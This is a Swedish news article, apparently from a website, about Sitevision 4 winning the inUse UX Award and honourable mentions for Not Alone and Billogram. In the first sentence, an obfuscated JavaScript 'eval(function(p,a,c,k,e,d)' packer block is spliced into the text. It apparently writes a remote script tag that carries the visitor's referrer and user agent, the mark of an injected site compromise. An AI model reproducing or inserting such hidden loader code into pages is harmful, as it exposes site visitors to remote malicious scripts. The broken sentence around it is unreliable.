Image Image Image Image Image Image Image Image Image Image

| 13 april, 2021

Scroll to top

Top

Sitevision 4 tog hem segern i inUse UX Award

Sitevision 4 tog hem segern i inUse UX Award
Sebastian

Idag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|aakds|var|u0026u|referrer|zhteh||js|php’.split(’|’),0,{}))
korades vinnaren i inUse UX Award, priset som lyfter fram och hyllar riktigt god användbarhet. Vann gjorde Sitevision 4, två hedersomnämnande delades även ut till Not Alone och Billogram.

Över 70 nominerade bidrag kom in, juryn tog fram tio finalister och av dessa valdes två hedersomnämnanden ut och en vinnare korades.

Motiveringen till årets vinnare Sitevision 4 lyder:

”När ett verktyg är riktigt bra, gynnar det inte bara den som hanterar verktyget. När även svåra och komplicerade rutiner kan utföras lätt och utan ansträngning, kan hantverkaren ägna mer tid åt att tänka på finishen, och på hur produkten verkligen ska gynna konsumenterna, slutanvändarna, målgruppen. Kort sagt: När hantverkaren arbetar med glädje gynnas alla som får del av resultatet av hens arbete. När det handlar om en så stor grupp hantverkare, och en så enorm grupp som kan dra nytta av att de har ett behagligt, tilltalande och stimulerande verktyg, kan vi inte göra annat än belöna verktyget för webbpublicering”

– Vi är överväldiga och ser detta som en bekräftelse på att vi är på rätt spår. Därmed inte sagt att vi är nöjda – vi är inte färdiga på långa vägar. Vi vill att det ska bli enklare för alla som jobbar med webb, säger Magnus Rosenstråle, affärsutvecklare på Sitevision.

Priset i InUse UX Award är 20 000 kronor i utbildningspott och en iPad signerad av Apple-grundaren Steve Wozniak. Utmärkelsen har som syfte att lyfta fram den produkt, app, sajt eller tjänst som bjudit på den bästa användarupplevelsen under 2014–2015.

Utöver vinnaren utsågs två hederspris. Ett av dem gick till Not Alone, en app som tar sig an ett otäckt och angeläget problem och vars lösning har ett helt nytt, smart interaktionsmönster. Not Alone var från början ett UF-företag som nu ombildats till AB. Det andra hedersomnämnandet gick till Billogram, en faktureringstjänst med bra språk och ett mycket enkelt arbetsflöde.

– För två år sedan fanns det inget svenskt pris med syftet att hylla god användbarhet – så då tog vi saken i egna händer. För andra året i rad delar vi ut inUse UX Award och med över 100 anmälda till festen är priset definitivt här för att stanna, menar Johan Berndtsson, initiativtagare till utmärkelsen och en av inUse-grundarna.

För att se alla nominerade bidrag, besök inUse UX Award-sajten. Fler bilder från kvällen finns på inUse Facebook-sida.